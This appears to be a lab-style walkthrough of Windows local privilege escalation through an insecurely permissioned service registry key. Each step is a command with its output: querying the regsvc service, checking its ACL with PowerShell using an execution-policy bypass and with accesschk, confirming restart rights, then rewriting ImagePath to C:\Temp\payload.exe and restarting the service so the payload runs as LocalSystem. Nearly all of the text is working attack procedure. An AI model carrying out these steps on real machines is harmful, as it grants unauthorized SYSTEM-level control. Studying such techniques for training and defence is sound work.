- reg query HKLM\SYSTEM\CurrentControlSet\Services\regsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Type REG_DWORD 0x10
Start REG_DWORD 0x3
ErrorControl REG_DWORD 0x1
ImagePath REG_EXPAND_SZ “C:\Program Files\Insecure Registry Service\insecureregistryservice.exe”
DisplayName REG_SZ Insecure Registry Service
ObjectName REG_SZ LocalSystem
get ACL on registry via powershell
2a) powershell -exec bypass -c “Get-Acl HKLM:\SYSTEM\CurrentControlSet\Services\regsvc | Format-List”
ath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvc
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : Everyone Allow ReadKey
NT AUTHORITY\INTERACTIVE Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
Audit :
Sddl : O:BAG:SYD:P(A;CI;KR;;;WD)(A;CI;KA;;;IU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)
or via AccessCheck sysinternals
2b) accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS
and the last check if service can be restarted
3) accesschk.exe /accepteula -ucqv regsvc
regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
…
SERVICE_START
SERVICE_STOP
…
Change ImagePath to the payload
4) reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\payload.exe /f
and restart the service
net stop regsvc
net start regsvc
4
Recent Comments